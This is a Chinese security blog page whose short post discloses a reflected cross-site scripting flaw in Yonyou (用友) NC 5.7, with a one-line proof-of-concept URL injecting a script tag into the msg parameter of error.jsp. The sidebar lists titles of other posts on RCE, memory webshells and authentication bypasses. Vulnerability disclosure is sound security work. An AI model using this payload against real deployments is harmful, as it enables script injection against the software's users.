LandGrey's Blog

Show Menu Hide Menu
  • 首页
  • 归档
  • 留言
  • 关于
  • 友链

用友 NC 5.7 反射性 XSS

  • 2020-03-28T14:03:12Z
  • •
  • 原创

就是想写简介,顺便发个简单漏洞

2020.03.28 日公开:

/uapws/pages/error.jsp?msg=<script>alert(1)</script>

标签: 分享  java 

  • 上篇基于内存 Webshell 的无文件攻击技术研究
  • 下篇 通过mysql jdbc 反序列化触发的 SpringBoot RCE 新利用方法

1 评论

  1. answer
    2020-04-29 07:11:01.775270 /回复

    = = 代码审计两小时,fuzz两分钟.......

« 1 »

评论

Search

分类

  • 代码审计 (9)
  • 其他 (5)
  • 安全开发 (2)
  • 渗透测试 (6)
  • 红队战争 (2)

最新文章

  • spring-security 三种情况下的认证绕过
  • Spring Boot Fat Jar 写文件漏洞到稳定 RCE 的探索
  • spring actuator restart logging.config rce
  • Apollo 配置中心未授权获取配置漏洞利用
  • 利用 intercetor 注入 spring 内存 webshell
  • xxl-job 执行器 RESTful API 未授权访问 RCE
  • Beetl 模版引擎执行任意 Java 代码的方法
  • 使用 MAT 查找 spring heapdump 中的密码明文
  • bypass openrasp SpEL RCE 的过程及思考
  • 通过mysql jdbc 反序列化触发的 SpringBoot RCE 新利用方法

标签

spring php 红队攻防 分享 java python 备忘 随笔

热门文章

© Copyright 2019 LandGrey's Blog